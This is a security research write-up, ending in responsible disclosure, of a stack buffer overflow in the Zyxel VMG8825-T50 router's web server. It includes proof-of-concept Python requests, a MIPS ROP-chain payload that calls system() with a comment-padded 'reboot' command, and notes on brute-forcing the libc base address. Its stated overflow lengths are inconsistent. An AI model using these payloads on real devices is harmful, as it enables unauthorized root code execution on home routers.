Exploiting a stack-based buffer overflow in practice

In my previous post, I detailed a fun method of obtaining root access on the Zyxel VMG8825-T50 router, which required physical access to the device and authenticated access to the web interface.

In this post, I will detail the exploitation of a vulnerability that could potentially result in unauthenticated RCE as root, given LAN access only. This vulnerability was also found on the VMG8825-T50 router, but it turns out to be present in multiple other Zyxel devices.

Classic buffer overflow

When an HTTP request comes in, the router’s zhttpd webserver compares the incoming request URL against a hardcoded list of endpoints, each of which has a corresponding request handler function. When there is no match, a fallback function (let’s call it _root_handler) takes care of the request.

The main purpose of this function seems to be to handle requests to static assets on the device’s filesystem, such as CSS and JavaScript files. To do so, it converts the requested URL to an absolute path on the filesystem before returning the contents of that file (if it exists).

To hold the result, the function defines a local 256-byte buffer in which the URL, converted to a path on the device’s filesystem, is stored.

The _root_handler function relies on another function (let’s call it _get_filepath_from_url), which checks for the presence of several specific paths. If none of them match, it copies the URL from the HTTP request (up to the first question mark, if it contains any) into the 256-byte buffer defined in _root_handler using a sscanf invocation:

Vulnerable sscanf invocation

If we therefore pass a URL longer than 256 bytes, the sscanf function will continue copying bytes past the boundary of the buffer, leading to a textbook linear stack-based buffer overflow, which can be triggered through an HTTP request from the device’s LAN.
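The effect of such an unbounded copy can be illustrated with a toy model in Python. This is only a sketch: the frame layout (a 256-byte buffer followed directly by a 4-byte saved return address), the stop bytes, and the names `unbounded_copy` and `make_frame` are assumptions made for illustration, and the real offsets on the device differ.

```python
BUF_SIZE = 256            # size of the local buffer described above
STOP_BYTES = b"?\x00"     # assumption: the copy ends at '?' or at the end of the string


def unbounded_copy(frame: bytearray, url: bytes) -> int:
    """Copy url into the start of frame with no length check; return bytes written."""
    written = 0
    for byte in url:
        if byte in STOP_BYTES:
            break
        frame[written] = byte   # never compared against BUF_SIZE
        written += 1
    return written              # (the terminating NUL sscanf would add is omitted)


def make_frame() -> bytearray:
    """Toy frame: the buffer, then a made-up 4-byte saved return address."""
    return bytearray(BUF_SIZE) + bytearray.fromhex("00401234")


# A URL that fits leaves the saved return address untouched.
frame = make_frame()
unbounded_copy(frame, b"/index.html?x=1")
intact_ra = bytes(frame[BUF_SIZE:])

# A URL of 256 + 4 bytes spills into the saved return address.
frame = make_frame()
unbounded_copy(frame, b"/" + b"X" * 255 + b"AAAA?x=1")
saved_ra = bytes(frame[BUF_SIZE:])
```

In this model, `saved_ra` ends up holding the four bytes that follow the 256 bytes of filler, which is the behaviour the rest of the post relies on.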

By requesting a specially crafted URL, we can overflow the buffer and overwrite the saved return address stored on the stack. When _root_handler returns, the processor jumps to the address we specified:

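import requests

TARGET_URL = "http://192.168.1.1"
# 251 filler bytes, followed by the 4 bytes that end up in the saved return address
path = "X" * 251 + "AAAA"
requests.get(f"{TARGET_URL}/{path}")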

Resulting in:

GDB output shows an attempt to return to 0x41414141

Limitations

Due to the logic performed before and during the sscanf operation, the payload that can be sent is somewhat limited. Specifically, several byte values cannot be used, as they break up the string during or before the sscanf operation. These include \0, &, ? and space. There is no URL-decoding step: this is the raw URL from the (potentially malformed) HTTP request, even if it includes characters that would normally be encoded.

This means that there’s no way around the bad bytes mentioned above, and it also means that we’re even more limited if we want the request to be a valid HTTP GET request, for example by constructing a malicious link or for performing a CSRF-like attack.

For the rest of this article I will therefore focus on the case of a local attacker on the device’s LAN, who is able to send arbitrary TCP data (and therefore potentially malformed HTTP requests) to the device.
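A minimal sketch of what sending such a hand-built request could look like is given below. The helper names (`find_bad_bytes`, `build_raw_request`, `send_raw`) are made up for illustration, port 80 is assumed from the plain `http://` URL used earlier, and the bad-byte list contains only the values named above, so the real list may be longer.

```python
import socket

BAD_BYTES = b"\x00&? "   # byte values named in the text; the real list may be longer


def find_bad_bytes(payload: bytes) -> list[tuple[int, int]]:
    """Return (offset, byte value) for every byte that would cut the URL short."""
    return [(i, b) for i, b in enumerate(payload) if b in BAD_BYTES]


def build_raw_request(path: bytes, host: bytes = b"192.168.1.1") -> bytes:
    """Assemble the request by hand so that no byte of the path gets URL-encoded."""
    bad = find_bad_bytes(path)
    if bad:
        raise ValueError(f"path contains bad bytes at {bad}")
    return b"GET /" + path + b" HTTP/1.1\r\nHost: " + host + b"\r\n\r\n"


def send_raw(request: bytes, addr: str = "192.168.1.1", port: int = 80,
             timeout: float = 5.0) -> bytes:
    """Send the bytes over a plain TCP socket and return the first chunk of the reply."""
    with socket.create_connection((addr, port), timeout=timeout) as sock:
        sock.sendall(request)
        try:
            return sock.recv(4096)
        except OSError:
            return b""   # timeout or reset, e.g. when the handler thread crashed
```

Checking the path before sending makes it obvious when a chosen address or command contains a byte that would truncate the copy, rather than having the exploit fail silently.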

Where to return to?

It turns out that the zhttpd binary is always mapped at a memory address starting with 0x00. Because a null-byte ends the sscanf operation, it is not possible to directly jump to a potential ROP gadget in the binary itself – especially considering that this is a big-endian target (MIPS).

The same holds for heap space mapped by the application. Additionally, the thread-specific stack space is marked non-executable, preventing us from writing shellcode to the stack and executing that.
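The null-byte problem for low addresses can be made concrete with a few lines of Python. This is a sketch only: the two addresses are hypothetical examples (one low, one high), and `copied_prefix` is a made-up helper that mimics a copy stopping at the first null byte.

```python
import struct


def copied_prefix(address: int, byte_order: str = ">") -> bytes:
    """Bytes of a packed 32-bit address that survive a NUL-terminated copy."""
    packed = struct.pack(byte_order + "I", address)
    return packed.split(b"\x00", 1)[0]


low_big_endian = copied_prefix(0x00401234)          # big-endian, as on this target
low_little_endian = copied_prefix(0x00401234, "<")  # for comparison only
high_big_endian = copied_prefix(0x77961234)
```

On a big-endian target the null byte comes first, so none of the low address is copied. On a little-endian target the null byte would come last and the three meaningful bytes would still arrive, which is why the byte order makes the restriction stricter here.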

The zhttpd binary does however make use of multiple shared libraries, which are mapped at high addresses that do not start with a null byte (usually between 0x76000000 and 0x78000000). The same holds for the shared stack space.

00400000-00456000 r-xp 00000000 1f:06 1761       /bin/zhttpd
00466000-00468000 rw-p 00056000 1f:06 1761       /bin/zhttpd
009d0000-009da000 rwxp 00000000 00:00 0          [heap]
75ca0000-75ca1000 ---p 00000000 00:00 0 
75ca1000-75ea0000 rw-p 00000000 00:00 0          [stack:21903]
75ea0000-75ea1000 ---p 00000000 00:00 0 
(...)
778a0000-778ad000 rw-s 00000000 00:01 98307      /SYSV000e051b (deleted)
778ae000-778ce000 rw-s 00000000 00:01 32769      /SYSVffffffff (deleted)
778ce000-778e0000 r-xp 00000000 1f:06 701        /usr/lib/libz.so.1.2.7
(...)
77961000-779db000 r-xp 00000000 1f:06 1464       /lib/libuClibc-0.9.33.2.so
779db000-779ea000 ---p 00000000 00:00 0 
779ea000-779eb000 r--p 00079000 1f:06 1464       /lib/libuClibc-0.9.33.2.so
779eb000-779ec000 rw-p 0007a000 1f:06 1464       /lib/libuClibc-0.9.33.2.so
(...)
7fba7000-7fbc8000 rwxp 00000000 00:00 0          [stack]
7fff7000-7fff8000 r-xp 00000000 00:00 0          [vdso]
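As a rough sketch, a listing like the one above can be filtered for executable mappings whose addresses do not begin with a null byte. The excerpt below is copied from that listing; the function name `reachable_exec_regions` is made up for illustration.

```python
MAPS_EXCERPT = """\
00400000-00456000 r-xp 00000000 1f:06 1761       /bin/zhttpd
009d0000-009da000 rwxp 00000000 00:00 0          [heap]
778ce000-778e0000 r-xp 00000000 1f:06 701        /usr/lib/libz.so.1.2.7
77961000-779db000 r-xp 00000000 1f:06 1464       /lib/libuClibc-0.9.33.2.so
7fba7000-7fbc8000 rwxp 00000000 00:00 0          [stack]
"""


def reachable_exec_regions(maps_text: str) -> list[tuple[int, int, str]]:
    """Executable mappings whose start address has a non-zero top byte."""
    regions = []
    for line in maps_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue                      # not a mapping line, e.g. "(...)"
        start, end = (int(x, 16) for x in fields[0].split("-"))
        perms = fields[1]
        name = fields[5] if len(fields) > 5 else ""
        if "x" in perms and start >> 24 != 0:
            regions.append((start, end, name))
    return regions


candidates = [name for _, _, name in reachable_exec_regions(MAPS_EXCERPT)]
```

For this excerpt, the binary itself and the heap are filtered out, leaving the two libraries and the main stack. Individual gadget addresses inside a surviving region still need to be checked byte by byte, since a null byte can also appear further down in an address.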

In the case of this zhttpd process, it turns out that library locations are randomly chosen out of 4096 possibilities. This means that we will either have to leak an address somehow, or guess a library base address by brute-force. I’ll come back to this later, but for now let’s assume that the libc base address is known. You could say this is cheating, but for me this was more a fun exercise than a practical attack.

Sketching out the attack

Given a leaked or brute-forced libc base address, we can try to build a ROP chain out of gadgets in libuClibc-0.9.33.2.so. This is an arbitrary choice, and we might as well use one of the other loaded libraries.

As a proof-of-concept, we can try to call libc’s system function with the string reboot as an argument. Fundamentally, we’ll build a return-to-libc attack prepended with a short ROP chain to set up the registers. We pick the reboot shell command because it clearly allows us to see when the exploit succeeds: when the network goes down because the router is rebooting.

An alternative approach would have been to use ROP to write shellcode to the executable stack and jump there. However, this would have required dealing with cache coherency as well.

When building a ROP chain, I like to approach it from two directions:

1. What registers and areas of memory do we currently have control over?
2. What are the register and memory values we need to obtain in the final state, i.e. in order to call system("reboot")?

The process of picking ROP gadgets then becomes a quest of finding a path between (1) and (2). With some searching and trial and error, each added gadget should shorten the length of the remaining path. Sometimes, a counter-intuitive step needs to be taken in the “wrong” direction in order to find a complete path. There are tools and formal techniques for doing this, but in this post we’ll take a manual approach.

Finding the right gadgets

With root access on the device (I used an authenticated command injection vulnerability that has since been patched), we can upload a MIPS gdbserver binary with which we can debug the zhttpd binary while sending requests. With GEF, we can get a nice overview of all of the register values at the time of the crash:

Register values at the time of the crash

The screenshot above is actually from a different payload than the one used to construct the attack. It turns out that we can also get full control over $pc by requesting a URL of exactly 523 bytes (with the $pc value at the end), instead of 255. I didn’t investigate why this happens, but the result is that we have some level of control over a slightly different set of registers, namely:

$a1: Pointer to a location in our payload
$a2: Pointer to a location in our payload
$s8: Literal value taken from a location in our payload 
$sp: Pointer to a location in our payload
$k0: Literal value taken from a location in our payload

Looking at our goal (executing system("reboot")), we need to set the argument to "reboot", and find a way to call system.

The former is done by making sure that $a0 points to a location within our payload. I used the following gadget:

Gadget to set $a0 (gadget2).

This sets $a0 to a location within our payload on the stack (where we can make sure to write reboot), before continuing execution from an address which is also stored in our payload.

The latter challenge is calling system. If we look at an arbitrary system(...) invocation in zhttpd, we see that it happens indirectly by storing the location of system in $t9 before calling it using jalr t9.

Functions on this architecture are called indirectly through $t9.

Apparently this is such a strong convention that libc functions use this value of $t9 internally to calculate a new value for $gp. This means that we cannot simply return into system with a jr ra gadget, as system itself relies on $t9 holding its own absolute address.

After some searching, I found a jalr t9 gadget which takes its value from a register we’re likely to be able to control ($s5), as opposed to an absolute value:

Gadget to call a controllable address using $t9 (gadget3).

Now the only thing that remains is setting $s5 to a value we control, which is easily done with another gadget:

Gadget to set $s5 and others (gadget1).

Luckily, the payload offsets used by each gadget are distinct. This results in the following payload:

# Parentheses let the expression span multiple lines.
payload = (
	b"A" * 15 +
	system +     # final jump location (libc_base + off_system)
	b"A" * 4 +
	gadget2 +    # gadget2 location (libc_base + off_gadget2)
	b"A" * 24 +
	cmd_20 +     # argument for system()
	gadget3 +    # gadget3 location (libc_base + off_gadget3)
	b"A" * 444 +
	gadget1      # gadget1 location (libc_base + off_gadget1)
)

assert len(payload) == 523

request = b"GET /" + payload + b" HTTP/1.1\nHost: 192.168.0.1\n\n"

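The only tough constraint with this setup is that we have only 20 bytes of space for the reboot command (or any other command that we want to pass to system). Since the payload cannot contain any null bytes, the string cannot be terminated in the usual way. Instead, we end the command with a shell comment so that the bytes following it are ignored, and use a tab in place of the space (which is also a bad byte):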

cmd_20 = b"reboot\t#aaaaaaaaaaaa"

After sending this request, the router immediately reboots :)
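Fitting other commands into the same 20-byte slot can be sketched with a small helper. The function name `fit_command` and its defaults are made up for illustration, and it only knows about the bad bytes named earlier.

```python
def fit_command(cmd: bytes, size: int = 20, filler: bytes = b"a") -> bytes:
    """Pad a shell command to exactly `size` bytes using a trailing comment."""
    # Space is a bad byte; the shell splits words on tabs as well.
    # Note that this also rewrites spaces inside quoted strings.
    cmd = cmd.replace(b" ", b"\t")
    for bad in (b"\x00", b"&", b"?"):
        if bad in cmd:
            raise ValueError(f"command contains bad byte {bad!r}")
    body = cmd + b"\t#"          # everything after '#' is ignored by the shell
    if len(body) > size:
        raise ValueError("command does not fit in the available space")
    return body + filler * (size - len(body))


cmd_20 = fit_command(b"reboot")
```

Because of the two bytes needed for the tab and the comment marker, the usable command length under these assumptions is 18 bytes.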

Practical exploitation

In order to turn this into a practical attack (e.g. a reverse shell), it is likely best to construct a slightly different ROP chain which allows for commands longer than 20 bytes.

And, as mentioned before, there’s of course also the prerequisite of having to leak or brute-force the libc base address. I did experiment a bit with brute-forcing, but I couldn’t get a reliable set-up going. Either zhttpd would crash so hard that its watchdog script would not even restart it, or I would only crash the request-handler threads, which made zhttpd slower and slower until it no longer responded at all (after 20-50 attempts). If, however, one could reliably test one base address per second, then a brute-force attack over the 4096 candidates would take roughly half an hour on average.
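The time estimate can be checked with some quick arithmetic. The sketch below compares two assumed models; which one applies depends on whether the library base changes between attempts, something that is not established here.

```python
N_BASES = 4096          # number of possible library base addresses
SECONDS_PER_TRY = 1.0   # the hypothetical rate of one attempt per second


def expected_minutes(expected_attempts: float) -> float:
    """Convert an expected number of attempts into minutes."""
    return expected_attempts * SECONDS_PER_TRY / 60


# Model A: the base stays fixed between attempts and candidates are tried
# one by one, so on average about half of them are needed.
fixed_base = expected_minutes((N_BASES + 1) / 2)

# Model B: the base is re-randomized after every crash, so each guess succeeds
# independently with probability 1/N_BASES (geometric distribution).
rerandomized = expected_minutes(N_BASES)

print(f"fixed base:    {fixed_base:.1f} min")
print(f"re-randomized: {rerandomized:.1f} min")
```

Under model A the expected time is about 34 minutes, in line with the rough figure above. Under model B it doubles to about 68 minutes.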

If while reading this article you thought “why not do X?”, please send me an email! I would love to hear about different approaches that I might have missed.

Responsible disclosure

The vulnerability described in this post was disclosed to the Zyxel security team (together with another one with lower impact). A public disclosure timeline of two months was mutually agreed upon.

The vulnerability was found in firmware version V5.50(ABPY.1)b14 of the VMG8825-T50. After investigation by Zyxel, it turns out to be present in multiple other Zyxel devices (as detailed in the Zyxel security advisory). For most of these devices, it has been patched in a December 2020 update.
